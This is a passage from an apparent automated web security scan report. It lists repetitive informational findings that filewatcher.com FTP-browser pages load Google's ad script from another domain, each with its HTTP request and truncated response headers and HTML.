User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IGbT16bb09qee1ic7kuRPA"
Content-Length: 26513
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 685
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.812. http://www.filewatcher.com/b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable/All.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.cse.buffalo.edu/mirror/BSD/FreeBSD/ports/amd64/packages-6-stable/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0DolDVGU2GVF2Cnidv9a1g"
Content-Length: 37858
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 684
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.cse.buffalo.edu/mirror/BSD/F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.813. http://www.filewatcher.com/b/ftp/ftp.eenet.ee.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.eenet.ee.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "7t7uK/yix4gdfDzdWTOcrA"
Content-Length: 7117
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 508
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/ - FTP Browser</tit
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.814. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.eenet.ee/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "X0r1P2YgmoAHYnuzyGQ8jw"
Content-Length: 6204
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 508
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/ - FTP Browser<
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.815. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/FreeBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.eenet.ee/pub/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "1vT+JJqTbp8Ulq5tJKl8Bg"
Content-Length: 5463
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 524
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/FreeBSD/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.816. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/FreeBSD/distfiles.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.eenet.ee/pub/FreeBSD/distfiles.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/FreeBSD/distfiles.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tMDhdltXsDcjD61OwopM0w"
Content-Length: 22320
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 525
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/FreeBSD/distfil
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.817. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.eenet.ee/pub/cpan.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kFFZ76UdMAnSJQQu8QKruA"
Content-Length: 11100
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 509
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.818. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan/scripts.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.eenet.ee/pub/cpan/scripts.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan/scripts.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "oxDN9p9OBQ4hXPB8TpRjPA"
Content-Length: 16158
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 515
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/scripts/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.819. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan/scripts/news.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.eenet.ee/pub/cpan/scripts/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan/scripts/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CBmQ9foRq8/qL7wXBvIiIA"
Content-Length: 13154
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 520
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/scripts/ne
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.820. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "d9Zu5BVbJv5iSpE0A+wyGw"
Content-Length: 7291
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 522
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/scripts/ne
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.821. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff/aub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff/aub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff/aub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "lMQqfxxsJQ9nhb76JE1lDQ"
Content-Length: 6931
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 523
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/scripts/ne
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.822. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xt0jzmIUDwisfVckCKmWGQ"
Content-Length: 5901
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 526
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.823. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m8s+A2M90ezOyf75rBXvAQ"
Content-Length: 12465
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 528
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/ - F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.824. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZOE7dBK+AtltZfKuq3Cb4w"
Content-Length: 6716
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 537
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.825. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "9wBXdw4DW5zwmhbcL0N2Gg"
Content-Length: 5978
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 537
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.826. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "nrjtWnMZvHq33j6fjsHksg"
Content-Length: 7336
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 539
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.827. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sfPhSIkadVgAQ3shlF5V1w"
Content-Length: 14118
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 542
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.828. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
